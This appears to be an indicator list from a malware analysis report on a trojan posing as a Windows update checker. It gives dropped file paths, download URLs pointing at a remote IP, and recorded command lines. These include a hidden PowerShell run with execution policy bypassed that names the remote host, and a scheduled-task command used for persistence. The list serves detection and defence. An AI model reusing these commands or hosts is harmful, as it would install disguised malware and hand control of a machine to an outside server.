Technical Information
- <SYSTEM32>\tasks\windowsupdatechecktask1
- %ALLUSERSPROFILE%\windowsupdatecheck\unload.tmp
- %ALLUSERSPROFILE%\windowsupdatecheck\updatecheck.ps1
- %ALLUSERSPROFILE%\windowsupdatecheck\updatecheck.exe
- %ALLUSERSPROFILE%\windowsupdatecheck\control.dll
- %TEMP%\wscript2.xml
- %ALLUSERSPROFILE%\windowsupdatecheck\updatecheck.ps1
- %TEMP%\wscript2.xml
- http://42.###.54.48:8081/UpdateCheck.exe via 42.##2.54.48
- http://42.###.54.48:8081/control.dll via 42.##2.54.48
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -File %ALLUSERSPROFILE%\WindowsUpdateCheck\UpdateCheck.ps1 42.192.54.48 8080 8081
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -File %ALLUSERSPROFILE%\WindowsUpdateCheck\UpdateCheck.ps1 42.192.54.48 8080 8081' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C "schtasks /create /xml C:\\Users\\user\\AppData\\Local\\Temp\\wscript2.xml /tn windowsUpdateCheckTask1 /F"
- '%WINDIR%\syswow64\schtasks.exe' /create /xml C:\\Users\\user\\AppData\\Local\\Temp\\wscript2.xml /tn windowsUpdateCheckTask1 /F